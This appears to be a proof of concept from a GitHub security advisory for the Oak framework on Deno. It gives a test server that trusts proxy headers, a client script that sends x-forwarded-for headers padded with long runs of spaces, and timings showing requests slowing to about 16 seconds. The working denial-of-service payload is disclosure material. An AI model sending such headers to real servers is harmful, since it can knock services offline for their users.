GHSA-r3v7-pc4g-7xp9

deno --version deno 2.4.3 v8 13.7.152.14-rusty typescript 5.8.3

import { Application } from "https://deno.land/x/oak/mod.ts"; const app = new Application({proxy: true}); let i = 1 app.use((ctx) => { // let url = ctx.request.url // test1) x-forwarded-proto let ips = ctx.request.ips // test2) x-forwarded-for console.log(`request ${i} received`) i++; ctx.response.body = "hello"; }); await app.listen({ port: 8080 });

const lengths = [2000, 4000, 8000, 16000, 32000, 64000, 128000] const data1 = lengths.map(l => 'A' + 'A'.repeat(l) + 'A'); const data2 = lengths.map(l => 'A' + ' '.repeat(l) + 'A'); async function run(data) { for (let i = 0; i < data.length; i++) { let d = data[i]; const start = performance.now(); await fetch("http://localhost:8080", { headers: { // "x-forwarded-proto": d, // test1) "x-forwarded-for": d, // test2) }, }); const end = performance.now(); console.log('length=%d, time=%d ms', d.length, end - start); } } console.log("\n[+] Test normal behavior") await run(data1) console.log("\n[+] Test payloads") await run(data2)

deno run --allow-net server.ts deno run --allow-net client.ts [+] Test normal behavior length=2002, time=14 ms length=4002, time=6 ms length=8002, time=3 ms length=16002, time=3 ms length=32002, time=2 ms length=64002, time=4 ms length=128002, time=3 ms [+] Test payloads length=2002, time=7 ms length=4002, time=22 ms length=8002, time=77 ms length=16002, time=241 ms length=32002, time=947 ms length=64002, time=4020 ms length=128002, time=15840 ms